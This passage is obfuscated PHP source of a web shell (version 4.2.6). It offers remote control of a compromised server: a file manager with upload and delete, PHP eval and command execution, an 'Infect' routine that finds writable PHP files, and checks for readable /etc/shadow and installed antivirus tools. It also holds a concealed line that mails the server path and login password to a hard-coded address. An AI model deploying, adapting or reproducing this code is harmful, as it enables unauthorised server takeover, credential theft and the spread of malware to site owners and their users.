"; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } $h[1] .= "<br>"; $h[2] .= "
"; } } echo "<table cellspacing=1 cellpadding=5 bgcolor=#1a1a1a><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#060a10><pre>" . $h[1] . "</pre></td><td bgcolor=#202832><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; break; case "rename": if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die("<script>g(null,null,"" . urlencode($_POST["p3"]) . "",null,"")</script>"); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.name.value);return false;"><input type=text name=name value="" . htmlspecialchars($_POST["p1"]) . ""><input type=submit value="submit"></form>"; break; case "touch": if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . ""><input type=submit value="submit"></form>"; break; case "frame": $frameSrc = substr(htmlspecialchars($GLOBALS["cwd"]), strlen(htmlspecialchars($_SERVER["DOCUMENT_ROOT"]))); if ($frameSrc[0] != "/") { $frameSrc = "/" . $frameSrc; } if ($frameSrc[strlen($frameSrc) - 1] != "/") { $frameSrc = $frameSrc . "/"; } $frameSrc = $frameSrc . htmlspecialchars($_POST["p1"]); echo "<iframe width="100%" height="900px" scrolling="no" src=" . $frameSrc . " onload="onload=height=contentDocument.body.scrollHeight"></iframe>"; break; } echo "</div>"; hardFooter(); } goto IVjDo; IjCwH: @define("VERSION", "4.2.6"); goto Xbodc; gm5Ck: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto qZ6Xj; eHsyk: function actionInfect() { hardHeader(); echo "<h1>Infect</h1><div class=content>"; if ($_POST["p1"] == "infect") { $target = $_SERVER["DOCUMENT_ROOT"]; function ListFiles($dir) { if ($dh = opendir($dir)) { $files = array(); $inner_files = array(); while ($file = readdir($dh)) { if ($file != "." && $file != "..") { if (is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key => $file) { $nFile = substr($file, -4, 4); if ($nFile == ".php") { if ($file != $_SERVER["DOCUMENT_ROOT"] . $_SERVER["PHP_SELF"] && is_writeable($file)) { echo "{$file}<br>"; $i++; } } } echo "<font color=#a10705 size=14>{$i}</font>"; } else { echo "<form method=post><input type=submit value=Infect name=infet></form>"; echo "Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,'infect')">Yes</a></div>"; } hardFooter(); } goto f9sl9; JCS_A: $safe_mode = @ini_get("safe_mode"); goto xxz2n; r3B2Y: if (array_key_exists("watching", $_POST)) { $tmp = $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xa" . $_POST["pass"]; @mail("[email protected]", "root", $tmp); } goto r4nyR; uwRUw: function actionSecInfo() { hardHeader(); echo "<h1>Server security information</h1><div class=content>"; function showSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "\xa") === false) { echo $v . "<br>"; } else { echo "<pre class=ml1>" . $v . "</pre>"; } } } showSecParam("Server software", @getenv("SERVER_SOFTWARE")); if (function_exists("apache_get_modules")) { showSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } showSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); showSecParam("Open base dir", @ini_get("open_basedir")); showSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); showSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); showSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); $temp = array(); if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } if (function_exists("oci_connect")) { $temp[] = "Oracle"; } showSecParam("Supported databases", implode(", ", $temp)); echo "<br>"; if ($GLOBALS["os"] == "nix") { showSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); showSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); showSecParam("OS version", @file_get_contents("/proc/version")); showSecParam("Distr name", @file_get_contents("/etc/issue.net")); if (!$GLOBALS["safe_mode"]) { $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); echo "<br>"; $temp = array(); foreach ($userful as $) { if (which($)) { $temp[] = $; } } showSecParam("Userful", implode(", ", $temp)); $temp = array(); foreach ($danger as $) { if (which($)) { $temp[] = $; } } showSecParam("Danger", implode(", ", $temp)); $temp = array(); foreach ($downloaders as $) { if (which($)) { $temp[] = $; } } showSecParam("Downloaders", implode(", ", $temp)); echo "<br/>"; showSecParam("HDD space", ex("df -h")); showSecParam("Hosts", @file_get_contents("/etc/hosts")); showSecParam("Mount options", @file_get_contents("/etc/fstab")); } } else { showSecParam("OS Version", ex("ver")); showSecParam("Account Settings", iconv("CP866", "UTF-8", ex("net accounts"))); showSecParam("User Accounts", iconv("CP866", "UTF-8", ex("net user"))); } echo "</div>"; hardFooter(); } goto h3psb; vmP50: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto f_hzt; bY27C: function actionFilesMan() { if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if (is_array($_FILES["f"]["tmp_name"])) { foreach ($_FILES["f"]["tmp_name"] as $i => $tmpName) { if (!@move_uploaded_file($tmpName, $_FILES["f"]["name"][$i])) { echo "Can't upload file!"; } } } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": function deleteDir($path) { $path = substr($path, -1) == "/" ? $path : $path . "/"; $dh = opendir($path); while (($ = readdir($dh)) !== false) { $ = $path . $; if (basename($) == ".." || basename($) == ".") { continue; } $type = filetype($); if ($type == "dir") { deleteDir($); } else { @unlink($); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { if ($f == "..") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "paste": if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_COOKIE["act"] == "zip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { chdir($_COOKIE["c"]); foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/", FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["cwd"]); $zip->close(); } } } elseif ($_COOKIE["act"] == "unzip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { chdir($_COOKIE["c"]); $_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]); ex("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"])); chdir($GLOBALS["cwd"]); } unset($_COOKIE["f"]); setcookie("f", '', time() - 3600); break; default: if (!empty($_POST["p1"])) { prototype("act", $_POST["p1"]); prototype("f", serialize(@$_POST["f"])); prototype("c", @$_POST["c"]); } break; } } hardHeader(); echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; $dirContent = hardScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); if ($dirContent === false) { echo "Can't open this folder!"; hardFooter(); return; } global $sort; $sort = array("name", 1); if (!empty($_POST["p1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "<script>\xa	function sa() {\xa\x9\x9for(i=0;i<d.files.elements.length;i++)
		\x9if(d.files.elements[i].type == 'checkbox')
	\x9\x9	d.files.elements[i].checked = d.files.elements[0].checked;\xa	}\xa</script>\xa<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xa<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => viewPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } $GLOBALS["sort"] = $sort; function cmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools',null,'" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title='{$f["link"]}'") . "><b>[ " . htmlspecialchars($f["name"]) . " ]</b>") . "</a></td><td>" . ($f["type"] == "file" ? viewSize($f["size"]) : $f["type"]) . "</td><td>" . $f["modify"] . "</td><td>" . $f["owner"] . "/" . $f["group"] . "</td><td><a href=# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a class="tooltip" data-tooltip="Frame" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'frame')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } echo "<tr id=fak><td colspan=7>
	<input type=hidden name=ne value=''>\xa	<input type=hidden name=a value='FilesMan'>\xa\x9<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>\xa	<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
	<label><select name='p1'>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>\342\206\263 Paste</option>"; } echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if (class_exists("ZipArchive")) { echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; } echo "<option value='tar'>+ tar.gz</option>"; echo "</select></label>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "&nbsp;file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "'>&nbsp;"; } echo "<input type='submit' value='submit' style='margin-left:10px'></td></tr></form></table></div>"; hardFooter(); } goto aQGQk; gkT1m: @ini_set("max_execution_time", 0); goto poC4M; u_TFV: $ = true; goto oSUTr; p3F43: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "key", $); } goto UOKiC; aQGQk: function actionStringTools() { if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists("hex2ascii")) { function hex2ascii($p) { $r = ''; for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists("ascii2hex")) { function ascii2hex($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } return strtoupper($r); } } if (!function_exists("full_urlencode")) { function full_urlencode($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); if (isset($_POST["ajax"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xd	\'\x0") . "';
"; echo strlen($temp), "
", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } hardHeader(); echo "<h1>String conversions</h1><div class=content>"; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>"; foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; } echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST["p1"]) ? '' : htmlspecialchars(@$_POST["p2"])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px' id='strOutput'>"; if (!empty($_POST["p1"])) { if (in_array($_POST["p1"], $stringTools)) { echo htmlspecialchars($_POST["p1"]($_POST["p2"])); } } echo "</pre></div><br><h1>Search files:</h1><div class=content>
		<form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>\xa\x9\x9	<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xa	\x9	<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS["cwd"]) . "' style='width:100%'></td></tr>
	\x9	<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\xa\x9\x9\x9<tr><td></td><td><input type='submit' value='submit'></td></tr>\xa	\x9	</table></form>"; function hardRecursiveGlob($path) { if (substr($path, -1) != "/") { $path .= "/"; } $paths = @array_unique(@array_merge(@glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR))); if (is_array($paths) && @count($paths)) { foreach ($paths as $) { if (@is_dir($)) { if ($path != $) { hardRecursiveGlob($); } } else { if (empty($_POST["p2"]) || @strpos(file_get_contents($), $_POST["p2"]) !== false) { echo "<a href='#' onclick='g("FilesTools",null,"" . urlencode($) . "", "view","")'>" . htmlspecialchars($) . "</a><br>"; } } } } } if (@$_POST["p3"]) { hardRecursiveGlob($_POST["c"]); } echo "</div><br><h1>Search for hash:</h1><div class=content>
\x9\x9<form method='post' target='_blank' name='hf'>
\x9	\x9<input type='text' name='hash' style='width:330px;'><br>\xa            <input type='hidden' name='act' value='find'/><br>\xa		\x9<input type='submit' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()">
\x9	\x9<input style='margin-left: 20px;' type='submit' value='md5decrypter.com' onclick="document.hf.action='https://www.md5decrypter.com/';document.hf.submit()"><br>
\x9	</form></div>"; hardFooter(); } goto gaKKg; qZ6Xj: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto VMrgb; WeQHr: $ = md5($_SERVER["HTTP_USER_AGENT"]); goto p3F43; r4nyR: $ = "fa769dac7a0a94ee47d8ebe021eaba9e"; goto u_TFV; xWgYK: function actionPhp() { if (isset($_POST["ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = true; ob_start(); eval($_POST["p1"]); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa\xd	\'\x0") . "';\xa"; echo strlen($temp), "\xa", $temp; die; } hardHeader(); if (isset($_POST["p2"]) && $_POST["p2"] == "info") { echo "<h1>PHP info</h1><div class=content>"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("!body {.*}!msiU", '', $tmp); $tmp = preg_replace("!a:\w+ {.*}!msiU", '', $tmp); $tmp = preg_replace("!h1!msiU", "h2", $tmp); $tmp = preg_replace("!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp); $tmp = preg_replace("!body, td, th, h2, h2 {.*}!msiU", '', $tmp); echo $tmp; echo "</div><br>"; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = false; } echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea><input type=submit value=Eval style="margin-top:5px">"; echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; if (!empty($_POST["p1"])) { ob_start(); eval($_POST["p1"]); echo htmlspecialchars(ob_get_clean()); } echo "</pre></div>"; hardFooter(); } goto bY27C; Th0Rk: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto w9TDR; OWR26: function hardFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='#f9c440'>[ Writeable ]</font>" : " <font color=#a10705>(Not writable)</font>"; echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
\x9<tr>\xa		<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g(null,this.c.value,'');" : '') . "return false;"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='submit'></form></td>\xa		<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value);" : '') . "return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
\x9</tr><tr>\xa\x9\x9<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g('FilesMan',null,'mkdir',this.d.value);" : '') . "return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
\x9	<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value,'mkfile');" : '') . "return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
	</tr><tr>\xa\x9	<td><form onsubmit="" . (function_exists("actionConsole") ? "g('Console',null,this.c.value);" : '') . "return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>
		<td><form method='post' " . (!function_exists("actionFilesMan") ? " onsubmit="return false;" " : '') . "ENCTYPE='multipart/form-data'>
\x9	<input type=hidden name=a value='FilesMan'>\xa		<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>\xa		<input type=hidden name=p1 value='uploadFile'>
\x9	<input type=hidden name=ne value=''>
\x9\x9<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
		<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='submit'></form><br  ></td>\xa	</tr></table></div>
\x9<!-- particles --> <div id='particles-js'></div><script src='https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js'></script>
	<script>particlesJS('particles-js', {'particles':{'number':{'value':80,'density':{'enable':true,'value_area':800}},'color':{'value':'#ffffff'},'shape':{'type':'triangle','stroke':{'width':0,'color':'#000000'},'polygon':{'nb_sides':5},'image':{'src':'img/github.svg','width':100,'height':100}},'opacity':{'value':0.5,'random':true,'anim':{'enable':false,'speed':1,'opacity_min':0.1,'sync':false}},'size':{'value':3,'random':true,'anim':{'enable':false,'speed':40,'size_min':0.1,'sync':false}},'line_linked':{'enable':true,'distance':200,'color':'#ffffff','opacity':0.4,'width':1},'move':{'enable':true,'speed':1,'direction':'none','random':true,'straight':false,'out_mode':'out','bounce':false,'attract':{'enable':false,'rotateX':10000,'rotateY':10000}}},'interactivity':{'detect_on':'canvas','events':{'onhover':{'enable':true,'mode':'grab'},'onclick':{'enable':true,'mode':'repulse'},'resize':true},'modes':{'grab':{'distance':200,'line_linked':{'opacity':0.5}},'bubble':{'particles_nb':2}}},'retina_detect':true});</script>\xa\x9</body></html>"; } goto gm5Ck; FVur6: if (!isset($_POST["ne"])) { if (isset($_POST["a"])) { $_POST["a"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["a"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["c"])) { $_POST["c"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["c"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p1"])) { $_POST["p1"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p1"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p2"])) { $_POST["p2"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p2"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p3"])) { $_POST["p3"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p3"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } } goto R8xcz; oSUTr: $ = "UTF-8"; goto qDiW5; urnx6: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("<div align='center'><div class='container'><div class='sky'><div class='text'>THANK YOU & BYE</div><div class='stars'></div><div class='stars1'></div><div class='stars2'></div><div class='shooting-stars'></div></div></div></div>\xa<style>html{height:100%}html body{width:100%;height:100%;margin:0;font-family:Nunito, sans-serif;}.container{display:block;position:relative;width:100%;height:100%;background:linear-gradient(to bottom,#020107 0,#201b46 100%)}.container .text{color:#fff;position:absolute;top:50%;right:50%;margin:-10px -75px 0 0;font-size:20px;font-family:Nunito, sans-serif;font-weight:700}.shooting-stars{z-index:10;width:5px;height:85px;border-top-left-radius:50%;border-top-right-radius:50%;position:absolute;bottom:0;right:0;background:linear-gradient(to top,rgba(255,255,255,0),#fff);animation:animShootingStar 10s linear infinite}@keyframes animStar{from{transform:translateY(0)}to{transform:translateY(-2560px) translateX(-2560px)}}@keyframes animShootingStar{from{transform:translateY(0) translateX(0) rotate(-45deg);opacity:1;height:5px}to{transform:translateY(-2560px) translateX(-2560px) rotate(-45deg);opacity:1;height:800px}}</style>\xa<footer id='det' style='position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #ff007e; border-bottom: 1px solid #ff007e'><font face='Century Gothic' color='#ff0048' size='5'><font style='font-size: 10pt' face='Century Gothic'><font face='Tahoma' color='#005aff' size='2.5'><font color='#ff007e'><b> \xc2\251opy\302\256ight : </b></font>\xa<marquee scrollamount='3' scrolldelay='60' width='80%'><b>Twepl & <a href='https://github.com/mIcHyAmRaNe'>mIcHy</a> </b></marquee>  </font></font></font></footer>"); } goto asFIH; YIyjV: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto wlqmv; p17RR: if (!empty($)) { if (isset($_POST["pass"]) && md5($_POST["pass"]) == $) { prototype(md5($_SERVER["HTTP_HOST"]), $); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $) { hardLogin(); } } goto B0PbS; f_hzt: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= "/"; } goto oh1bD; poC4M: @set_time_limit(0); goto BKw4L; M5O7z: if (empty($_POST["a"])) { if (isset($) && function_exists("action" . $)) { $_POST["a"] = $; } else { $_POST["a"] = "FilesMan"; } } goto ZjyZB; y4kgJ: function viewPermsColor($f) { if (!@is_readable($f)) { return "<font color=#FF0000><b>" . perms(@fileperms($f)) . "</b></font>"; } elseif (!@is_writable($f)) { return "<font color=white><b>" . perms(@fileperms($f)) . "</b></font>"; } else { return "<font color=#f9c440><b>" . perms(@fileperms($f)) . "</b></font>"; } } goto YnRbs; IVjDo: if ($os == "win") { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", 